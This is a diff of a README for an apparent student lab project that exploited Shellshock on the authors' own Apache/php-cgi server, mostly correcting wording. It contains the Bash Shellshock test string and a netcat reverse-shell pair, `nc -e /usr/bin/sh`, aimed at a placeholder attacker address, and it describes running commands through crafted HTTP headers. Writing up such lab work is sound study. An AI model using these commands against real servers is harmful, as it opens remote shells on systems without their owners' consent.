DrPandemic/RBE/README.md

  `env x='() { :;}; echo vulnerable' bash -c "echo this is a test`

 - Next, we set up an http server on a CentOS machine with Apache and php-cgi running a very simple script (see index.php).
-The JOY when it worked!

 - We started out by sending simple crafted HTTP packets that echoed text (inspired by [this blog post](http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html#.VCNinnVdW00).
+The JOY when it worked!

-- We then tested more elaborate commands to discover what we had acces to.
+- We then tested more elaborate commands to discover what we had access to.
 In our case, typing the command names as an apache user would not resolve the commands, yet calling them explicitly (`/usr/bin/command`) worked.
-We were able to run `find` commands and see all the files we had access to.
+We were then able, for example, to run `find` commands and see all the files we had access to.

 - At this point, it was annoying to type the commands individually.
-Fortunately, `nc` was installed on the server, so we used a reverse bind shell (`nc -lvp xxx` for the attacker and `nc -e /usr/bin/sh atckr_addr port`) for flexibility.
-At this point, we had a shell on the system, but running as apache user, all through a single HTTP packet with the right (or wrong?) headers.
+Fortunately, `nc` was installed on the server, so we used a reverse bind shell (`nc -lvp xxx` for the attacker and `nc -e /usr/bin/sh atckr_addr port` for the victim) for flexibility.
+At this point, we had a shell on the system, but running as an apache user, all through a single HTTP packet with the right (or wrong?) headers.

 - To simplify the process, we made a python script (in this repo) that calls netcat automatically.